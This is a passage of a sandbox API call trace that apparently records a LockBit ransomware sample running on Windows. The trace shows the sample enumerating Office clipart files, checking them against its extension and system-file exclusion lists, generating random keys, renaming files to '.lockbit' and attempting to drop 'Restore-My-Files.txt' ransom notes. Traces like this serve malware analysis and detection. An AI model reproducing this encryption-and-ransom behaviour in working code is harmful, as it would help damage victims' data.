0x1fa2ed8 [0166.548] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.549] free (_Block=0x1fa2ed8) [0166.549] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00578_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.549] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.550] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x896e9800, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x896e9800, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00608_.WMF", cAlternateFileName="")) returned 1 [0166.550] lstrcmpiW (lpString1=".", lpString2="PE00608_.WMF") returned -1 [0166.550] lstrcmpiW (lpString1="..", lpString2="PE00608_.WMF") returned -1 [0166.550] PathFindExtensionW (pszPath="PE00608_.WMF") returned=".WMF" [0166.550] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.550] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.551] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.551] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00608_.WMF") returned 1 [0166.552] lstrcmpiW (lpString1="ntldr", lpString2="PE00608_.WMF") returned -1 [0166.552] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00608_.WMF") returned -1 [0166.552] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00608_.WMF") returned -1 [0166.552] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00608_.WMF") returned -1 [0166.552] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00608_.WMF") returned 1 [0166.552] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00608_.WMF") returned -1 [0166.552] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.552] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00608_.WMF") returned=".WMF" [0166.552] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.552] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.552] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.553] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.553] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00608_.WMF.lockbit") returned 72 [0166.553] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00608_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00608_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.557] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.557] malloc (_Size=0x40068) returned 0x3df0008 [0166.557] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6440) returned 1 [0166.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.558] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.560] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00608_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00608_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.560] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.560] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.561] free (_Block=0x1fa2ed8) [0166.561] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00608_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.561] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.561] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c352400, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c352400, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x4cea, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00633_.WMF", cAlternateFileName="")) returned 1 [0166.561] lstrcmpiW (lpString1=".", lpString2="PE00633_.WMF") returned -1 [0166.561] lstrcmpiW (lpString1="..", lpString2="PE00633_.WMF") returned -1 [0166.561] PathFindExtensionW (pszPath="PE00633_.WMF") returned=".WMF" [0166.562] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.562] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.562] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.563] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00633_.WMF") returned 1 [0166.563] lstrcmpiW (lpString1="ntldr", lpString2="PE00633_.WMF") returned -1 [0166.563] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00633_.WMF") returned -1 [0166.563] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00633_.WMF") returned -1 [0166.563] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00633_.WMF") returned -1 [0166.563] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00633_.WMF") returned 1 [0166.563] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00633_.WMF") returned -1 [0166.563] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.563] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF") returned=".WMF" [0166.563] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.564] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.564] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.564] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF.lockbit") returned 72 [0166.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00633_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0166.565] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.565] malloc (_Size=0x40068) returned 0x3d70450 [0166.565] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=19690) returned 1 [0166.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0166.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0166.566] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0166.571] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.571] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.571] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.571] free (_Block=0x1fa2ed8) [0166.571] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.571] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.572] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bd0f200, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8bd0f200, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xb12c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00640_.WMF", cAlternateFileName="")) returned 1 [0166.572] lstrcmpiW (lpString1=".", lpString2="PE00640_.WMF") returned -1 [0166.572] lstrcmpiW (lpString1="..", lpString2="PE00640_.WMF") returned -1 [0166.572] PathFindExtensionW (pszPath="PE00640_.WMF") returned=".WMF" [0166.572] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.572] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.573] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.573] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00640_.WMF") returned 1 [0166.574] lstrcmpiW (lpString1="ntldr", lpString2="PE00640_.WMF") returned -1 [0166.574] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00640_.WMF") returned -1 [0166.574] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00640_.WMF") returned -1 [0166.574] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00640_.WMF") returned -1 [0166.574] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00640_.WMF") returned 1 [0166.574] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00640_.WMF") returned -1 [0166.574] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.574] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF") returned=".WMF" [0166.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.574] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.574] 